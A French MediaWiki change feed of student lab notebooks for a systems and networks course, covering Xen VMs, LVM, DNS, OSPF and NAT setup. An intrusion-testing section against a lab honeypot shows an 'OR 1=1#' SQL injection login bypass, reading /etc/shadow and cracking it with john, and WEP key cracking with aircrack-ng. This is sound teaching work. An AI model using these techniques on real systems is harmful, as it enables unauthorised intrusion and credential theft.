&lt;br /&gt;
Pour répondre à ce problème, nous avons essayé de recompiler la dernière version des '''linux-utils''', de les configurer et de les installer.&lt;br /&gt;
&lt;br /&gt;
Cela a bien fonctionné mais n'a pas répondu au problème et finalement a fait bugué l'ensemble du serveur capbreton.&lt;br /&gt;
&lt;br /&gt;
Pour récupérer des utilitaires fonctionnels, M. Redon a dû réinstaller les utilitaires depuis la commande apt en vérifiant les numéros de version au préalable.&lt;br /&gt;
&lt;br /&gt;
La prochaine fois, nous ferons bien attention à rajouter un tiret pour se connecter en root (su -)...&lt;br /&gt;
&lt;br /&gt;
Pour créer les disques virtuels, au préalable, commande '''pvcreate''' sur les disques physiques&lt;br /&gt;
  lvcreate /dev/sde /dev/sdf storage pour créer le volume logique&lt;br /&gt;
  lvcreate -L10G -n JeandedieuTheauX storage&lt;br /&gt;
&lt;br /&gt;
Pour créer deux partitions logiques.&lt;br /&gt;
&lt;br /&gt;
Pour les monter dans les dossier '''/var''' et '''/home''' de la VM, nous les formattons (mkfs.ext4)&lt;br /&gt;
Puis modifions le fichier de configuration de la VM --&amp;gt; ajout des lignes &lt;br /&gt;
  'phy:/dev/storage/JeandedieuTheauX,xvdavY,w'&lt;br /&gt;
  X=[1 || 2]; Y = [3 || 4]&lt;br /&gt;
&lt;br /&gt;
Au passage, nous modifions la ligne vif --&amp;gt; ajout à la fin du bridge : &lt;br /&gt;
  bridge=IMA5sc&lt;br /&gt;
&lt;br /&gt;
Après le boot de la VM : &lt;br /&gt;
  xl create -c /etc/xen/morillon.cfg &lt;br /&gt;
  xl console morillon (si active) &lt;br /&gt;
&lt;br /&gt;
Nous modifions le fichier ''''/etc/fstab''' pour monter automatiquement les dossiers /var et /home sur les partitions '''xvdav'''.&lt;br /&gt;
&lt;br /&gt;
=== Tests d'intrusion  ===&lt;br /&gt;
&lt;br /&gt;
* Cassage de clef WEP d'un point d'accès WiFi&lt;br /&gt;
&lt;br /&gt;
Dans cette partie, nous avons chercher à effectuer une intrusion sur un point d'accès WiFi&lt;br /&gt;
&lt;br /&gt;
Nous avons pour cela installé le paquetage aircrack-ng qui est un programme de surveillance des réseaux sans fil &lt;br /&gt;
&lt;br /&gt;
Il permet de ce fait d'effectuer un cassage des clés WEP ou WPA par exemple&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps nous allons utiliser le programme pour cracker un des points d'accès : cracotte06&lt;br /&gt;
&lt;br /&gt;
Nous retrouvons le nom de son BSSID et son channel grâce à la commande suivante :&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Groupe6-IMA2021-1.png|600px|thumb|center|BSSID]]&lt;br /&gt;
&lt;br /&gt;
Nous effectuer la commande iwconfig pour retrouver le nom de notre interface wifi&lt;br /&gt;
&lt;br /&gt;
Grâce aux deux commandes suivantes lancées dans deux terminaux différents aircrack-ng. &lt;br /&gt;
&lt;br /&gt;
[[Fichier:Groupe6-IMA2021-2.png|600px|thumb|center|capture de paquets]]&lt;br /&gt;
&lt;br /&gt;
Comme on le voit sur les deux captures d'écran ci-dessous, nous retrouvons notre clé en Hexadecimal &lt;br /&gt;
&lt;br /&gt;
[[Fichier:Groupe6-IMA2021-3.png|600px|thumb|center|clef trouvée]]&lt;br /&gt;
&lt;br /&gt;
*  Intrusion sur un serveur d’application Web&lt;br /&gt;
&lt;br /&gt;
L'objectif de cette intrusion est de réussir à trouver un mot de passe sur le site honey.plil.info&lt;br /&gt;
&lt;br /&gt;
Pour cela, plusieurs techniques ont été utilisées notamment les méthodes d'injection ou d'exploration de système fichiers&lt;br /&gt;
&lt;br /&gt;
La première étape consistait à utitliser la méthode d'injection en tapant sur http://honey.plil.info/ l'instruction &lt;br /&gt;
 Identifiant : 'OR 1=1#&lt;br /&gt;
 Mot de passe : 'OR 1=1#&lt;br /&gt;
&lt;br /&gt;
Ce qui nous a permis d'obtenir le mot de passe admin de la page http://honey.plil.info/phpmyadmin&lt;br /&gt;
&lt;br /&gt;
Une fois connectée à cette dernière nous avons cherché à trouver le chemin du fichier de mot de passe de php &lt;br /&gt;
&lt;br /&gt;
.... ajouter le chemin...&lt;br /&gt;
&lt;br /&gt;
Cela nous a permis de retrouver le fichier nous permettant de nous connecter à la base de données &lt;br /&gt;
&lt;br /&gt;
....&lt;br /&gt;
&lt;br /&gt;
Dans ce fichier, nous avons retrouvé les identifiants&lt;br /&gt;
&lt;br /&gt;
Nous nous sommes connectés en root &lt;br /&gt;
&lt;br /&gt;
Et nous avons obtenus le mot de passe au niveau de l'arborescence test/&lt;br /&gt;
&lt;br /&gt;
Arrivé à cette étape nous nous sommes connectés en ssh &lt;br /&gt;
 ssh rex@honey.plil.info &lt;br /&gt;
 mot de passe : ****&lt;br /&gt;
&lt;br /&gt;
On a installé l'utilitaire shadow&lt;br /&gt;
&lt;br /&gt;
cat /etc/shadow&lt;br /&gt;
touch file&lt;br /&gt;
... Add first line in fil&lt;br /&gt;
.... Uncrypt with john&lt;br /&gt;
&lt;br /&gt;
===Connexion de la VM au net===&lt;br /&gt;
&lt;br /&gt;
Après plusieurs modifications par nos camarades et professeurs sur le serveur, nous avons eu la marche à suivre afin de configurer correctement la VM pour la connecter au web.&lt;br /&gt;
&lt;br /&gt;
Pour cela, nous avons modifié le fichier /etc/network/interfaces pour avoir la configuration suivante :&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Screenshot_config_morillon.png ]]&lt;br /&gt;
&lt;br /&gt;
Nous avons donc comme configuration l'adresse web 193.48.57.183 vue par l'extérieur, un routage sur l'adresse 100.64.0.23 sur l'OSPF qui correspond au réseau virtuel via le VLAN 333 et l'adresse routeur 100.64.0.2. Le mot clé src indique que les paquets à destination du 193.x.x.x est à destination de l'ip du VLAN.&lt;br /&gt;
&lt;br /&gt;
Par la suite, une route doit être créée sur l'OSPF pour connecter correctement la VM sur le VLAN au web, une simple commande grâce au minicom :&lt;br /&gt;
    enable&lt;br /&gt;
      conf t&lt;br /&gt;
        vlan 333&lt;br /&gt;
        ip route 193.48.57.183 255.255.255.255 100.64.0.23&lt;br /&gt;
&lt;br /&gt;
===Modification host DNS et configuration de bind9===&lt;br /&gt;
&lt;br /&gt;
====Modification sur gandi.net====&lt;br /&gt;
Afin d'être identifiable sur le net, nous avons besoin d'un DNS sur notre VM.&lt;br /&gt;
&lt;br /&gt;
Pour cela, nous créons un glue record sur gandi.net pour morillon avec l'adresse web externe : 193.48.57.183 en attribuant comme nameserver ns1.morillon.website&lt;br /&gt;
&lt;br /&gt;
Ainsi, nous pouvons exporter le DNS sur notre serveur tel que le nameserver 1 est le notre : ns1.morillon.website et le 2, comme adressage de secours : ns6.gandi.net&lt;br /&gt;
&lt;br /&gt;
Malheureusement, bien qu'on ait demandé à gandi d'exporter le nameserver le dimanche 1er novembre vers 12h30, celui-ci n'a pas pris en compte notre demande.&lt;br /&gt;
&lt;br /&gt;
Elle fut redemandé le 2 novembre...&lt;br /&gt;
&lt;br /&gt;
====Configuration de bind9====&lt;br /&gt;
&lt;br /&gt;
Après installation&lt;br /&gt;
    apt install bind9&lt;br /&gt;
&lt;br /&gt;
nous avons configuré bind9 dans le dossier local de la VM&lt;br /&gt;
    etc/bind9/&lt;br /&gt;
&lt;br /&gt;
Le fichier db.morillon.website a été créé. Nous y avons ajouté les lignes suivantes :&lt;br /&gt;
&lt;br /&gt;
 BIND data file for local loopback interface;&lt;br /&gt;
 $TTL    604800&lt;br /&gt;
 @       IN      SOA     ns1.morillon.website. postmaster.morillon.website. (&lt;br /&gt;
                              3         ; Serial&lt;br /&gt;
                         604800         ; Refresh&lt;br /&gt;
                          86400         ; Retry&lt;br /&gt;
                        2419200         ; Expire&lt;br /&gt;
                         604800 )       ; Negative Cache TTL&lt;br /&gt;
 ;&lt;br /&gt;
 @       IN      NS      ns1.morillon.website.&lt;br /&gt;
 @       IN      NS      ns6.gandi.net.&lt;br /&gt;
 ns1     IN      A       193.48.57.183&lt;br /&gt;
&lt;br /&gt;
===Sécurisation du serveur===&lt;br /&gt;
&lt;br /&gt;
Pour sécuriser le serveur et accéder à notre site web apache2, ce dernier a besoin d'un certificat.&lt;br /&gt;
&lt;br /&gt;
Pour l'obtenir, nous avons tout d'abord créer un CSR et une private key dans le dossier home du serveur.&lt;br /&gt;
    openssl req -nodes -newkey rsa:2048 -sha:256 -keyout morillon.key -out morillon.csr&lt;br /&gt;
&lt;br /&gt;
Et fourni les éléments d'identification de notre serveur (localisation, nom commun, etc.)&lt;br /&gt;
&lt;br /&gt;
===Encryption Clé USB===&lt;br /&gt;
&lt;br /&gt;
Pour sécuriser une clé avec un mot de passe, nous avons utilisé cryptsetup. On s'assure d'abord de partir sur une clé toute propre :&lt;br /&gt;
    fdisk -l&lt;br /&gt;
    #sélection de la clé à formater&lt;br /&gt;
    fdisk /dev/sdb&lt;br /&gt;
    o #creation table MBR&lt;br /&gt;
    n #creation nouvelle partition&lt;br /&gt;
    w #écriture sur la clé&lt;br /&gt;
&lt;br /&gt;
La commande crypsetup utilisée est la suivante :&lt;br /&gt;
    cryptsetup open --type plain /dev/sdb1 encryptedDevice&lt;br /&gt;
    #s'en suit une demande de mdp&lt;br /&gt;
&lt;br /&gt;
Elle monte ensuite dans le dossier ''/dev/mapper'' et il devient possible de la formater :&lt;br /&gt;
    mkfs.ext4 /dev/mapper/encryptedDevice&lt;/div&gt;</summary>
		<author><name>Jnduwamu</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021&amp;diff=53059</id>
		<title>TP sysres IMA5sc 2020/2021</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021&amp;diff=53059"/>
				<updated>2020-11-02T15:45:17Z</updated>
		
		<summary type="html">&lt;p&gt;Jnduwamu : /* Plan d'adressage */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Répartition des binômes ==&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Cahier !! Elèves &lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA5sc 2020/2021 G1 | Cahier groupe n°1]]&lt;br /&gt;
| GURY Evan &amp;amp; DUBOIS Vincent&lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA5sc 2020/2021 G2 | Cahier groupe n°2]]&lt;br /&gt;
| BARGIBANT Quentin &amp;amp; LAGNEAU Alex&lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA5sc 2020/2021 G3 | Cahier groupe n°3]]&lt;br /&gt;
| SIMONIN Richard &amp;amp; MERTZ Thomas&lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA5sc 2020/2021 G4 | Cahier groupe n°4]]&lt;br /&gt;
| BENAYED Samuel &amp;amp; EVRARD Théo&lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA5sc 2020/2021 G5 | Cahier groupe n°5]]&lt;br /&gt;
| RINGOT Loïc &amp;amp; SANCHEZ Pierre&lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA5sc 2020/2021 G6 | Cahier groupe n°6]]&lt;br /&gt;
| NDUWAMUNGU Jean De Dieu &amp;amp; MOINAT Théau&lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA5sc 2020/2021 G7 | Cahier groupe n°7]]&lt;br /&gt;
| EKHLAS EID Nour &amp;amp; BISALLI Clara&lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA5sc 2020/2021 G8 | Cahier groupe n°8]]&lt;br /&gt;
| SOULAIMANI Jawad &amp;amp; TEKIN Kadir&lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA5sc 2020/2021 G9 | Cahier groupe n°9]]&lt;br /&gt;
| VIEUBLED Tanguy &amp;amp; VERNIER Paul&lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA5sc 2020/2021 G10 | Cahier groupe n°10]]&lt;br /&gt;
| MALTI Hind &amp;amp; AHOUASSOU Loris&lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA5sc 2020/2021 G11 | Cahier groupe n°11]]&lt;br /&gt;
| DARDENNE Sébastien &amp;amp; CALLERISA Corto&lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA5sc 2020/2021 G12 | Cahier groupe n°12]]&lt;br /&gt;
| NORMAND Quentin &amp;amp; CLAUDEL Maxime&lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA5sc 2020/2021 G13 | Cahier groupe n°13]]&lt;br /&gt;
| NOM Prénom &amp;amp; NOM Prénom&lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA5sc 2020/2021 G14 | Cahier groupe n°14]]&lt;br /&gt;
| FAUCHOIS Lukas &amp;amp; ROUILLÉ Guillaume&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
==Plan d'adressage==&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Groupe !! Domaine !! Distribution !! VLAN privé !! IP (publique) !! IP (privée)&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 14&lt;br /&gt;
| oronge.site&lt;br /&gt;
| Debian 10 Buster&lt;br /&gt;
| 314&lt;br /&gt;
| 193.48.57.176&lt;br /&gt;
| 100.64.0.16&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 12&lt;br /&gt;
| &lt;br /&gt;
|&lt;br /&gt;
| 312&lt;br /&gt;
| 193.48.57.177&lt;br /&gt;
| 100.64.0.17&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 11&lt;br /&gt;
| stropharia.site&lt;br /&gt;
| Debian 10 Buster&lt;br /&gt;
| 311&lt;br /&gt;
| 193.48.57.178&lt;br /&gt;
| 100.64.0.18&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 10&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
| 310&lt;br /&gt;
| 193.48.57.179&lt;br /&gt;
| 100.64.0.19&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 9&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
| 309&lt;br /&gt;
| 193.48.57.180&lt;br /&gt;
| 100.64.0.20&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 8&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
| 308&lt;br /&gt;
| 193.48.57.181&lt;br /&gt;
| 100.64.0.21&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 7&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
| 307&lt;br /&gt;
| 193.48.57.182&lt;br /&gt;
| 100.64.0.22&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 6&lt;br /&gt;
| morillon.website&lt;br /&gt;
|&lt;br /&gt;
| 306&lt;br /&gt;
| 193.48.57.183&lt;br /&gt;
| 100.64.0.23&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 5&lt;br /&gt;
| amanite.site&lt;br /&gt;
| Debian 10 Buster&lt;br /&gt;
| 305&lt;br /&gt;
| 193.48.57.184&lt;br /&gt;
| 100.64.0.24&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 4&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
| 304&lt;br /&gt;
| 193.48.57.185&lt;br /&gt;
| 100.64.0.25&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 3&lt;br /&gt;
| clavaire.site&lt;br /&gt;
| Debian 10 Buster&lt;br /&gt;
| 303&lt;br /&gt;
| 193.48.57.186&lt;br /&gt;
| 100.64.0.26&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 2&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
| 302&lt;br /&gt;
| 193.48.57.187&lt;br /&gt;
| 100.64.0.27&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 1&lt;br /&gt;
| trompettedelamort.site&lt;br /&gt;
| Debian 10 Buster&lt;br /&gt;
| 301&lt;br /&gt;
| 193.48.57.188&lt;br /&gt;
| 100.64.0.28&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Groupe !! Domaine !! VLAN !! IPV4 !! IPV4 6509-E !! IPV4 C9200 !! IPV4 Routeur !! IPV6&lt;br /&gt;
|-&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| 1&lt;br /&gt;
| 10.60.100.0/24&lt;br /&gt;
| 10.60.100.1&lt;br /&gt;
| 10.60.100.2&lt;br /&gt;
| 10.60.100.254&lt;br /&gt;
| 2001:660:4401:60b0::0/64&lt;br /&gt;
|-&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| 131&lt;br /&gt;
| 192.168.222.8/29&lt;br /&gt;
| 192.168.222.12&lt;br /&gt;
| 192.168.222.13&lt;br /&gt;
| &lt;br /&gt;
| 2001:660:4401:60b1::0/64&lt;br /&gt;
|-&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| 333&lt;br /&gt;
| 100.64.0.0/24&lt;br /&gt;
| 100.64.0.1&lt;br /&gt;
| 100.64.0.2&lt;br /&gt;
| 100.64.0.3&lt;br /&gt;
| 2001:660:4401:60b2::0/64&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 1&lt;br /&gt;
| trompettedelamort.site&lt;br /&gt;
| 301&lt;br /&gt;
| 10.60.101.0/24&lt;br /&gt;
| 10.60.101.1&lt;br /&gt;
| 10.60.101.2&lt;br /&gt;
| 10.60.101.254&lt;br /&gt;
| 2001:660:4401:60b3::0/64&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 2&lt;br /&gt;
| &lt;br /&gt;
| 302&lt;br /&gt;
| 10.60.102.0/24&lt;br /&gt;
| 10.60.102.1&lt;br /&gt;
| 10.60.102.2&lt;br /&gt;
| 10.60.102.254&lt;br /&gt;
| 2001:660:4401:60b4::0/64&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 3&lt;br /&gt;
| &lt;br /&gt;
| 303&lt;br /&gt;
| 10.60.103.0/24&lt;br /&gt;
| 10.60.103.1&lt;br /&gt;
| 10.60.103.2&lt;br /&gt;
| 10.60.103.254&lt;br /&gt;
| 2001:660:4401:60b5::0/64&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 4&lt;br /&gt;
| &lt;br /&gt;
| 304&lt;br /&gt;
| 10.60.104.0/24&lt;br /&gt;
| 10.60.104.1&lt;br /&gt;
| 10.60.104.2&lt;br /&gt;
| 10.60.104.254&lt;br /&gt;
| 2001:660:4401:60b6::0/64&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 5&lt;br /&gt;
| &lt;br /&gt;
| 305&lt;br /&gt;
| 10.60.105.0/24&lt;br /&gt;
| 10.60.105.1&lt;br /&gt;
| 10.60.105.2&lt;br /&gt;
| 10.60.105.254&lt;br /&gt;
| 2001:660:4401:60b7::0/64&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 6&lt;br /&gt;
| morillon.website&lt;br /&gt;
| 306&lt;br /&gt;
| 10.60.106.0/24&lt;br /&gt;
| 10.60.106.1&lt;br /&gt;
| 10.60.106.2&lt;br /&gt;
| 10.60.106.254&lt;br /&gt;
| 2001:660:4401:60b8::0/64&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 7&lt;br /&gt;
| &lt;br /&gt;
| 307&lt;br /&gt;
| 10.60.107.0/24&lt;br /&gt;
| 10.60.107.1&lt;br /&gt;
| 10.60.107.2&lt;br /&gt;
| 10.60.107.254&lt;br /&gt;
| 2001:660:4401:60b9::0/64&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 8&lt;br /&gt;
| &lt;br /&gt;
| 308&lt;br /&gt;
| 10.60.108.0/24&lt;br /&gt;
| 10.60.108.1&lt;br /&gt;
| 10.60.108.2&lt;br /&gt;
| 10.60.108.254&lt;br /&gt;
| 2001:660:4401:60ba::0/64&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 9&lt;br /&gt;
| &lt;br /&gt;
| 309&lt;br /&gt;
| 10.60.109.0/24&lt;br /&gt;
| 10.60.109.1&lt;br /&gt;
| 10.60.109.2&lt;br /&gt;
| 10.60.109.254&lt;br /&gt;
| 2001:660:4401:60bb::0/64&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 10&lt;br /&gt;
| &lt;br /&gt;
| 310&lt;br /&gt;
| 10.60.110.0/24&lt;br /&gt;
| 10.60.110.1&lt;br /&gt;
| 10.60.110.2&lt;br /&gt;
| 10.60.110.254&lt;br /&gt;
| 2001:660:4401:60bc::0/64&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 11&lt;br /&gt;
| stropharia.site&lt;br /&gt;
| 311&lt;br /&gt;
| 10.60.111.0/24&lt;br /&gt;
| 10.60.111.1&lt;br /&gt;
| 10.60.111.2&lt;br /&gt;
| 10.60.111.254&lt;br /&gt;
| 2001:660:4401:60bd::0/64&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 12&lt;br /&gt;
| &lt;br /&gt;
| 312&lt;br /&gt;
| 10.60.112.0/24&lt;br /&gt;
| 10.60.112.1&lt;br /&gt;
| 10.60.112.2&lt;br /&gt;
| 10.60.112.254&lt;br /&gt;
| 2001:660:4401:60be::0/64&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 14&lt;br /&gt;
| oronge.site&lt;br /&gt;
| 314&lt;br /&gt;
| 10.60.114.0/24&lt;br /&gt;
| 10.60.114.1&lt;br /&gt;
| 10.60.114.2&lt;br /&gt;
| 10.60.114.254&lt;br /&gt;
| 2001:660:4401:60bf::0/64&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
== Installation du réseau ==&lt;br /&gt;
&lt;br /&gt;
=== Branchement du matériel ===&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Global_scheme_PRA_2020.png|600px|center|Schéma de câblage]]&lt;br /&gt;
&lt;br /&gt;
=== Connexions entre équipements ===&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! !! Type !! Port&lt;br /&gt;
|-&lt;br /&gt;
| 6509-E&lt;br /&gt;
| Fibre 10G&lt;br /&gt;
| Te5/4&lt;br /&gt;
|-&lt;br /&gt;
| 9200&lt;br /&gt;
| Fibre 10G&lt;br /&gt;
| Te1/1/1&lt;br /&gt;
|}&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! !! Type !! Port&lt;br /&gt;
|-&lt;br /&gt;
| 6509-E&lt;br /&gt;
| Fibre 10G&lt;br /&gt;
| Te6/5&lt;br /&gt;
|-&lt;br /&gt;
| ISR 4331&lt;br /&gt;
| Fibre 10G&lt;br /&gt;
| AAA&lt;br /&gt;
|}&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! !! Type !! Port !! VLAN !! IP&lt;br /&gt;
|-&lt;br /&gt;
| 6509-E&lt;br /&gt;
| Fibre 10G&lt;br /&gt;
| Te5/5&lt;br /&gt;
| 333&lt;br /&gt;
| 100.64.0.1/24&lt;br /&gt;
|-&lt;br /&gt;
| CAPBRETON&lt;br /&gt;
| Fibre 10G&lt;br /&gt;
| Eth5&lt;br /&gt;
| N/A&lt;br /&gt;
| N/A&lt;br /&gt;
|}&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! !! Type !! Port !! VLAN !! IP&lt;br /&gt;
|-&lt;br /&gt;
| 6509-E&lt;br /&gt;
| Fibre 10G&lt;br /&gt;
| Te6/4&lt;br /&gt;
| 131&lt;br /&gt;
| 192.168.222.12/29&lt;br /&gt;
|-&lt;br /&gt;
| ECOLE&lt;br /&gt;
| Fibre 10G&lt;br /&gt;
| N/A&lt;br /&gt;
| N/A&lt;br /&gt;
| N/A&lt;br /&gt;
|}&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! !! Type !! Port !! VLAN !! IP&lt;br /&gt;
|-&lt;br /&gt;
| 9200&lt;br /&gt;
| Fibre 1G&lt;br /&gt;
| Te1/1/3&lt;br /&gt;
| 333&lt;br /&gt;
| 100.64.0.2/24&lt;br /&gt;
|-&lt;br /&gt;
| CAPBRETON&lt;br /&gt;
| Cuivre&lt;br /&gt;
| Eth4&lt;br /&gt;
| N/A&lt;br /&gt;
| N/A&lt;br /&gt;
|}&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! !! Type !! Port&lt;br /&gt;
|-&lt;br /&gt;
| 9200&lt;br /&gt;
| Cuivre&lt;br /&gt;
| Te5/4&lt;br /&gt;
|-&lt;br /&gt;
| ISR 4331&lt;br /&gt;
| Cuivre&lt;br /&gt;
| AAA&lt;br /&gt;
|}&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! !! Type !! Port !! VLAN !! IP&lt;br /&gt;
|-&lt;br /&gt;
| 9200&lt;br /&gt;
| Fibre 10G&lt;br /&gt;
| Gi1/0/1&lt;br /&gt;
| 131&lt;br /&gt;
| 192.168.222.13/29&lt;br /&gt;
|-&lt;br /&gt;
| ECOLE&lt;br /&gt;
| Fibre 10G&lt;br /&gt;
| N/A&lt;br /&gt;
| N/A&lt;br /&gt;
| N/A&lt;br /&gt;
|}&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! !! Type !! Port !! VLAN !! IP&lt;br /&gt;
|-&lt;br /&gt;
| ISR 4331&lt;br /&gt;
| Cuivre&lt;br /&gt;
| Gi1/0/2&lt;br /&gt;
| XXX&lt;br /&gt;
| YYY.YYY.YYY.YYY&lt;br /&gt;
|-&lt;br /&gt;
| SDSL&lt;br /&gt;
| Cuivre&lt;br /&gt;
| N/A&lt;br /&gt;
| N/A&lt;br /&gt;
| N/A&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
=== Paramétrage de l'OSPF ===&lt;br /&gt;
&lt;br /&gt;
'''6509-E'''&lt;br /&gt;
&lt;br /&gt;
 router ospf 1                                          # un numéro de processus                                                                                                         &lt;br /&gt;
  router-id 10.60.0.1                                   # un id pour le routeur (plus petite adresse disponible)&lt;br /&gt;
  log-adjacency-changes                                                                                  &lt;br /&gt;
  summary-address 193.48.57.176 255.255.255.240         # adresse que l'on souhaite diffuser aux voisins (addresse du VLAN 333)                                                                                                            &lt;br /&gt;
  summary-address 100.64.0.0 255.240.0.0 not-advertise   # address q'on veut pas diffuser (celle du reseau privé)&lt;br /&gt;
  summary-address 10.0.0.0 255.0.0.0 not-advertise      # address q'on veut pas diffuser (?)                                                                                                             &lt;br /&gt;
  redistribute connected subnets                        # autorise la diffusion pour les nouveaux réseaux qui peuvent être connectés   &lt;br /&gt;
  redistribute static subnets route-map ospf                                                                                                                            &lt;br /&gt;
  network 192.168.222.8 0.0.0.7 area 2                  # domaine de diffusion OSPF&lt;br /&gt;
&lt;br /&gt;
'''9200'''&lt;br /&gt;
&lt;br /&gt;
 router ospf 1                                                                                                                                    &lt;br /&gt;
  router-id 10.60.0.2                                   # on change simplement l'id du routeur par rapport au 6509-E&lt;br /&gt;
  log-adjacency-changes                                                                                  &lt;br /&gt;
  summary-address 193.48.57.176 255.255.255.240                                                                                                         &lt;br /&gt;
  summary-address 100.64.0.0 255.240.0.0 not-advertise  &lt;br /&gt;
  summary-address 10.0.0.0 255.0.0.0 not-advertise                                                                                                    &lt;br /&gt;
  redistribute connected subnets                       &lt;br /&gt;
  redistribute static subnets route-map ospf                                                                                                                            &lt;br /&gt;
  network 192.168.222.8 0.0.0.7 area 2&lt;br /&gt;
&lt;br /&gt;
=== Paramétrage NAT ===&lt;br /&gt;
&lt;br /&gt;
L'objectif du NAT est de faire la translation ip_privee&amp;lt;-&amp;gt;ip_publique entre les VM et l'extérieur&lt;br /&gt;
&lt;br /&gt;
'''6509-E'''&lt;br /&gt;
&lt;br /&gt;
[A COMPLETER]&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    configure terminal&lt;br /&gt;
    ip nat inside source static local-ip global-ip&lt;br /&gt;
    interface type number&lt;br /&gt;
    ip address ip-address mask [secondary]&lt;br /&gt;
    ip nat inside&lt;br /&gt;
    exit&lt;br /&gt;
    interface type number&lt;br /&gt;
    ip address ip-address mask [secondary]&lt;br /&gt;
    ip nat outside&lt;br /&gt;
    end&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''9200'''&lt;/div&gt;</summary>
		<author><name>Jnduwamu</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G6&amp;diff=53038</id>
		<title>TP sysres IMA5sc 2020/2021 G6</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G6&amp;diff=53038"/>
				<updated>2020-11-02T14:48:19Z</updated>
		
		<summary type="html">&lt;p&gt;Jnduwamu : /* Configuration de bind9 */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=== Création de la machine virtuelle ===&lt;br /&gt;
&lt;br /&gt;
Pour créer la machine virtuelle, une fois connecté sur le serveur capbreton, la commande utilisée est la suivante : &lt;br /&gt;
  ssh capbreton.plil.info&lt;br /&gt;
  su -&lt;br /&gt;
  xen-create-image --hostname=morillon --dist=buster --ip=100.64.0.21 --netmask=255.255.255.240 --dir=/usr/local/xen/ --gateway=100.64.0.5 --force&lt;br /&gt;
&lt;br /&gt;
Cependant, nous obtenions une erreur de type '''mkswap''' absent.&lt;br /&gt;
&lt;br /&gt;
